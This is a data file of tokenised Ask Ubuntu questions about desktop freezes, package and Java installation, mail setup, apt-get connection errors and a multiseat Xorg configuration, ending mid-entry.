477304	dragging windows between workspaces freezes ui	i am having a problem on two systems when i enable multiple workspaces and try to move windows between them ( zoomed out using the workspaces button on the unity bar ) the ui freezes . to replicate : enable workspaces click on the workspaces button on the left take a window and drag it to another workspace once it crosses the threshold to another workspace the workspace screen does n't return to unity . if you hit a key ( like alt ) the window snaps to wherever the mouse is but the workspaces screen is unable to return to the unity interface . the only way i was able to get back was the kill -hup both system 's are using amd gpus and i tried the open and closed drivers . does anybody have an idea on how to fix this ?
477305	unity has become a complete mess after installation of pantheon	after i installed pantheon , my unity desktop is sometimes showing only black screen and the launcher and sometimes it is showing only wallpaper and launcher . i am not able too see the desktop icons . also , even after purging pantheon ppa panteon still remains there . my other de 's like cinnamon and kde are working fine . please help !
477306	qml qt 5.2 problem with mp4 video	i have qt 5.2 ( ubuntu sdk ) installed on ubuntu 14.04 when i try to run qml code : mediaplayer { id : mediaplayer source : `` ../path/test.mp4 '' autoplay : true } videooutput { id : video width : screen.width height : screen.height source : mediaplayer anchors.horizontalcenter : parent.horizontalcenter anchors.verticalcenter : parent.verticalcenter } i get : error : `` your gstreamer installation is missing a plug-in . '' note : 1 ) i can play test.mp4 in totem 2 ) i can play ogv files with above code what am i missing ? any help will be very appreciated .
477307	what is the best method of measuring hdd status on a server ?	i have a brand new server in place that is running 14.04 . this is acting as our web server for hosting multiple moodle sites for nearby school districts . i do n't have the gui installed . i need to make sure i can accurately determine and resolve any potential hdd failure . i have four 1tb drives in raid10 , run by a megaraid controller . is there a particular package i can install or a command i can add to my cron to check for potential issues and email alerts ?
477312	easiest way to send data from ubuntu 14.04 to mac via bluetooth ?	i got gnome-bluetooth in ubuntu 14.04 to send some data via bluetooth . it functions perfectly fine with recent android smartphones ( see pic 1 ) but i did not manage to send something to a ( paired ) mac ( see pic 2 ) . does anybody made the same experience ? pic 1 : cell phone with send button in right-hand corner pic 2 : mac without send button in right-hand corner edit : filled bug report over here in launchpad .
477313	itunes replacement	this is a pretty specialized problem , but i ca n't think who else to ask . i 'm putting together a laptop for my little sister , who is an 18-year-old aspberger 's kid . she currently uses windows xp , and i 'm trying to get her onto ubuntu . she 's used my ubuntu system with no difficulties , so there 's not a problem there . the issue is itunes . she has an ipod and uses itunes to manage her music . ideally , i 'm looking for something that 's a fairly direct translation . what i absolutely must have is something that is equally easy to use , into which i can transfer all her itunes music , and is able to interact with her ipod nano in all the same ways itunes will . ideally , something with a store would be good . i 've used amazon , but their downloader does n't play nice with linux . i have n't used google music , but have heard good things . i used mediamonkey quite a while ago , but could never get it to work reliably with any portable player . what i do n't know is what will play nice with both ubuntu and the nano . the most reasonable suggestion i 've gotten so far is `` use google/amazon for shopping and storage , use winamp for playing and syncing . '' that seems like it will work , but i do n't know if anyone has any better ideas . i 'm willing to do a considerable amount of setup , as long as i can be reasonably certain that i 'll never have to touch it again .
477325	unable to log in after full disk encryption + separate encfs encryption of home directory	i followed this ( german ) guide to set up an encrypted ubuntu system . however i wanted to have my home directory on a separate disk and also encrypted , but using encfs . so i chose a partition on another disk and marked it as home partition . later on i opted to encrypt my home partition using encfs . after restarting i am reproducably unable to log in . i can only log in in terminal mode . having logged in in terminal mode i can see , that the home directory is not mounted correclty ( i see the accessyourprivatedata link , which is shown , when encfs is not mounted correctly ) . how can i configure my system to automount the home directory correctly using my user pw as chosen during installation ?
477326	jdk 8 install in ubuntu	i 'm tring to install jdk 8 for weeks , but it fails.following are some outputs , sudo update-alternatives -- config java there is only one alternative in link group java ( providing /usr/bin/java ) : /opt/java-oracle/jdk1.8.0/bin/java nothing to configure . which java /usr/bin/java java bash : /usr/local/java/jdk1.7.0_51/bin/java : no such file or directory ls -l /usr/bin/java /usr/bin/java - > /etc/alternatives/java ls -l /etc/alternatives/java /etc/alternatives/java - > /opt/java-oracle/jdk1.8.0/bin/java sudo update-alternatives -- config javac /opt/java-oracle/jdk1.8.0/bin/javac 1 manual mode javac error : could not find libjava.so error : could not find java se runtime environment . if you can please give me a help to slove this problem . thank you
477327	how can i batch rename files with terminal	if i have a set of files like : 1-3-image export-08_s3c1.jpg and i would like to rename the first part to look something like this , by adding and replacing the first part with 'g2_nr2_replicate2 ' : g2_nr2_replicate2_s3c1.jpg how would i batch process this in a terminal ?
477328	synclient - clickfinger1 settings ignored	i have a laptop with a clickpad . i want to treat pressing the clickpad as a right-click . i run synclient clickfinger1=3 but the setting is ignored . all the other settings ( e.g clickfinger2 , clickfinger3 ) work just fine . is it a bug , or am i missing something obvious ?
477329	lan not working on dual boot ( ubuntu 14.04 lts ) and no superuser privilege	i am having 2 different problems with dual boot . i recently installed ubuntu 14.04 lts 64bit on my windows 7 64bit laptop with live usb . i created partition first and used the usb . i selected option to install ubuntu alongside window 7 on installation manu . while installing there was no lan connection although the lan cable was connected . however , i decided to proceed with the same . i am able to dual boot normally however i am unable to access internet while in ubuntu ( windows no problem ) . i setup lan manually in ubuntu as it was not detecting lan . after the setup i connect to internet without any issue but no access to internet . while trying to resolve the problem i came across another problem and that is `` permission denied '' . when i used some command in terminal with sudo/su it gives result but in some case it says permission denied . for instance , i was trying to edit netwrok interface but it says `` permission denied '' . i do n't have any modem as i am using cable internet . i also tried to release ip as per some suggestion on the web however that 's not possible as it is a cable internet . i have been goggling but could not come across any possible solution . any suggestion will be appreciated .
477333	when i tried logging in with the username and password i used in wubi , it would n't let me log in	so i just installed ubuntu 13.04 on my windows 7 laptop not replacing windows 7 with wubi . but for some reason when i used i loged on to ubuntu using the username and password i typed in for wubi , it would n't let me on . i tried reinstalling wubi but this time using the password as `` i '' . i tried `` i '' as my password , but it still did n't work .
477336	why am i getting a 451 temporary local problem with my ssmtp/mailx setup ?	i 've attempted many times to use ssmtp to send mails from my 12.04 server to no avail . with the help of @ fkraiem i 've got some settings worked out but something is still wrong with my ssmtp setting . when i run the command echo `` mail . '' | mailx -s `` subject '' recipient @ somewhere.org it returns nothing , no mail sent , etc . i check /var/log/mail.log and find that i 'm getting errors . first it was 550 sender verify failed , now i get 451 temporary local problem . what can i do ? i can send mail through sendemail .
477337	how to install qt4.6 libraries on ubuntu 12.04 ?	i use ubuntu 12.04 . i am working with qt ide . i need qt4.6 libraries for supporting my applications . instead of this ubuntu 12.04 provide qt creator ide based on qt4.8.0 libraries by default . i 've tried to downgrade qt packages or install old packages designed for old ubuntu distributions ( such as ubuntu 10.04 ) but it did not work - it 's not easy to satisfy all the dependencies . i have removed qt4-doc package by sudo apt-get remove qt4-doc and installed older qt4-doc package intended for ubuntu 10.04 which i downloaded from http : //packages.ubuntu.com/lucid/qtcreator-doc . but my update manager always want to upgrade it to newer version that supports not qt4.6 but qt4.8 library documentation . also i tried to build and install qt4.6 libraries by myself . for this reason i downloaded tar.gz file from http : //download.qt-project.org/archive/qt/4.6/ and made configure , make and make install . so i get installed qt4.6 libraries but it did not work properly - there were some issues with performance and visualization of my application . also after i reboot my computer i could not login to it in graphics mode ( only with console ) and i was not able to repair it . how can i install qt4.6 libraries on ubuntu 12.04 ? is there any safe way to downgrade my packages ? could anybody give me some hint on this problem ? i would appreciate any help or useful link connected to my problem . also could anybody explain me how packaging system works .
477338	4od wont stream on ubuntu 14.04	i have recently upgraded to ubuntu 14.04 from 12 and can not get 4od to stream . i have tried getting hal , as suggested for the same problem with 13.10 , from the repository but it still does nothing . when i hit play i just get the loading circle forever : ( i have tried reinstalling the flash player but that did n't work either . does anyone know how to fix this ?
477339	`` unable to connect to 80.112.143.217:80 '' , why ?	after installing a fresh copy of ubuntu 14.04 downloaded from ubuntu.com i am trying to install some packages be it nodejs or apache2 it always says name not found . i searched a bit and found some answers here unable to install files with apt-get : `` unable to locate package '' http : //ubuntuforums.org/showthread.php ? t=2204637 http : //ubuntuforums.org/showthread.php ? t=2225203 but no solution worked for me . i already have all the sources enabled - also , tried sudo apt-get update many times but it returns some output like this saying unable to download or find packages or something like that - err http : //in.archive.ubuntu.com trusty/universe translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty/universe translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/restricted sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/universe sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/multiverse sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/main sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/main i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/restricted i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/universe i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/multiverse i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/main translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/main translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/multiverse translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/multiverse translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/restricted translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/restricted translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/universe translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-updates/universe translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/restricted sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/universe sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/multiverse sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/main sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/restricted i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/universe i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/multiverse i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/main i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/main translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/main translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/multiverse translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/multiverse translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/restricted translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/restricted translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/universe translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-backports/universe translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/restricted sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/universe sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/multiverse sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/main sources unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/restricted i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/universe i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/multiverse i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/main i386 packages unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/main translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/main translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/multiverse translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/multiverse translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/restricted translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/restricted translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/universe translation-en_in unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty-proposed/universe translation-en unable to connect to 80.112.143.217:80 : err http : //in.archive.ubuntu.com trusty/main sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-proposed/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/linrunner/tlp/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/noobslab/apps/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/thefanclub/ubuntu-after-install/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/partner/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/partner/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/partner/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/restricted/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/universe/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/main/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/restricted/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/universe/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/multiverse/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/restricted/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/restricted/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/universe/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/universe/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/binary-i386/packages unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/multiverse/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/restricted/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/universe/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/multiverse/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/restricted/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/universe/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/main/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/linrunner/tlp/ubuntu/dists/trusty/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/linrunner/tlp/ubuntu/dists/trusty/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/trusty/main/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/trusty/restricted/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en_in unable to connect to 80.112.143.217:80 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/main/i18n/translation-en unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/restricted/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/universe/source/sources unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/multiverse/source/sources unable to connect to 80.112.143.217:80 : sudo : unable to resolve host unknown-gg003aa-acj-sr5160il err http : //in.archive.ubuntu.com trusty inrelease err http : //in.archive.ubuntu.com trusty-updates inrelease err http : //in.archive.ubuntu.com trusty-backports inrelease err http : //in.archive.ubuntu.com trusty-proposed inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //dl.google.com stable inrelease err http : //ppa.launchpad.net trusty release.gpg unable to connect to 80.112.143.217:80 : err http : //archive.ubuntu.com trusty inrelease err http : //security.ubuntu.com trusty-security inrelease err http : //archive.ubuntu.com trusty release.gpg unable to connect to 80.112.143.217:80 : err http : //security.ubuntu.com trusty-security release.gpg unable to connect to 80.112.143.217:80 : err http : //archive.canonical.com trusty inrelease err http : //archive.canonical.com trusty release.gpg unable to connect to 80.112.143.217:80 : err http : //extras.ubuntu.com trusty inrelease err http : //extras.ubuntu.com trusty release.gpg unable to connect to 80.112.143.217:80 : reading package lists ... done w : failed to fetch http : //ppa.launchpad.net/noobslab/apps/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/thefanclub/ubuntu-after-install/ubuntu/dists/trusty/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-proposed/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/linrunner/tlp/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/noobslab/apps/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //ppa.launchpad.net/thefanclub/ubuntu-after-install/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/release.gpg unable to connect to 80.112.143.217:80 : w : some index files failed to download . they have been ignored , or old ones used instead . what should i do now
477341	mutiseat with 14.04 using intel onboard and nvidia gpu	i try to set up a multiseat system on kubuntu 14.04 . the system has an intel on-board gpu and a pcie nvida gpu . i have added the mutiseat ppa.the following config files did more or less work in kubuntu 13.10 but now on a freshly installed 14.04 both screens stay dark . i need help to find out what is wrong with my setup . can anyone help , please ? does 14.04 already provide multiseat capabilities ? seat0 : section `` serverlayout '' identifier `` seat0 '' screen 0 `` screen0 '' 0 0 # inputdevice `` kbd_0 '' # inputdevice `` mouse_0 '' # option `` autoenabledevices '' `` off '' # option `` autoadddevices '' `` off '' # option `` allowemptyinput '' `` on '' endsection section `` module '' load `` glx '' endsection section `` serverflags '' option `` xinerama '' `` 0 '' # to avoid problems on the x server initalization caused by the not recognizing of the mouse option `` allowmouseopenfail '' `` yes '' # disable vt switching # option `` dontvtswitch '' `` true '' # option `` dontvtswitch '' `` yes '' # this disallows the use of the ctrl+alt+backspace sequence # option `` dontzap '' `` yes '' # option `` allowemptyinput '' `` true '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 # option `` twinview '' `` 1 '' # option `` twinviewxineramainfoorder '' `` dfp-0 '' # option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 , dfp-2 : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection section `` device '' identifier `` card0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 670 '' busid `` pci:1:0:0 '' option `` probeallgpus '' `` false '' option `` nologo '' `` true '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` hannstar display corp hanns.g hi221 '' horizsync 24.0 - 94.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` inputclass '' identifier `` ignore_other_seats '' option `` ignore '' `` yes '' endsection section `` inputclass '' identifier `` use_seat_devices '' matchtag `` input_seat0 '' option `` ignore '' `` no '' endsection seat1 : section `` serverlayout '' identifier `` seat1 '' screen 0 `` screen0 '' 0 0 # inputdevice `` mouse_1 '' # inputdevice `` kbd_1 '' # option `` autoenabledevices '' `` off '' # option `` autoadddevices '' `` off '' # option `` allowemptyinput '' `` on '' option `` xinerama '' `` off '' endsection section `` module '' load `` glx '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` device '' identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' option `` nologo '' `` true '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` inputclass '' identifier `` ignore_other_seats '' option `` ignore '' `` yes '' endsection section `` inputclass '' identifier `` use_seat_devices '' matchtag `` input_seat1 '' option `` ignore '' `` no '' endsection lightdm.conf : [ lightdm ] seats=seat:0 seat:1 [ seat:0 ] xserver-command=/usr/bin/x -config xorg_nvidia.conf -isolatedevice pci:1:0:0 :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -sharevts -keeptty # autologin-user=demo0 autologin-user-timeout=5 [ seat:1 ] xserver-command=/usr/bin/x -config xorg_intel.conf -isolatedevice pci:0:2:0 :1 -auth /var/run/lightdm/root/:1 -nolisten tcp vt7 -sharevts -keeptty # autologin-user=demo1 autologin-user-timeout=5 [ seatdefaults ] user-session=kubuntu greeter-session=lightdm-kde-greeter greeter-show-manual-login=true allow-guest=false exit-on-failure=true 99-seat.rules # initially all input-devices are allocated to seat:0 subsystem== '' input '' , env { id_input.tags } = '' input_default '' # seat 0 uses usb-ports 2 and 3 , seat 1 uses 1 and 4 : subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/usb1/* '' , env { id_input.tags } = '' input_seat1 '' subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/usb2/* '' , env { id_input.tags } = '' input_seat0 '' subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/usb3/* '' , env { id_input.tags } = '' input_seat0 '' subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/usb4/* '' , env { id_input.tags } = '' input_seat1 '' # seperate sound cards subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/sound/card0/* '' , env { id_input.tags } = '' input_seat0 '' subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/sound/card1/* '' , env { id_input.tags } = '' input_seat1 '' # input-devices for seat:1 are connected at usb bus 1 # subsystem== '' input '' , devpath== '' /devices/pci0000:00/*/usb1/* '' , env { id_input.tags } = '' input_seat1 '' # subsystem== '' input '' , devpath== '' /devices/pci0000:00/0000:00:1a.0/usb1/* '' , env { id_seat } = '' seat1 '' # subsystem== '' input '' , devpath== '' /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5:1.0/video4linux/video0 '' , env { id_input.tags } = '' input_seat1 '' # subsystem== '' video4linux '' , devpath== '' 